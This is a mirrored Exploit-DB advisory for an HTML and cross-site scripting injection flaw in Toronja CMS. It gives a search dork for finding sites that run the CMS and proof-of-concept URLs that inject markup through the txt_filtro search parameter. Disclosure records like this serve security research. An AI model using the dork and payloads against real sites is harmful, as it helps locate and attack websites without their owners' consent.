exploit-db-mirror/exploits/php/webapps/12771.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

25 lines
No EOL
843 B
Text

-------------------------------------------------------------------------------------------
Toronja Cms HTML/XSS Injection Vulnerability
-------------------------------------------------------------------------------------------
Author : CoBRa_21
Script Home : http://www.toronja.com.pe/
Dork : intext:"sitio web diseñado por www.toronja.com.pe"
-------------------------------------------------------------------------------------------
HTML Injection:
http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=<font size=15 color=green>CoBRa_21</font>HTML
-------------------------------------------------------------------------------------------
XSS Injection:
http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=XSS
-------------------------------------------------------------------------------------------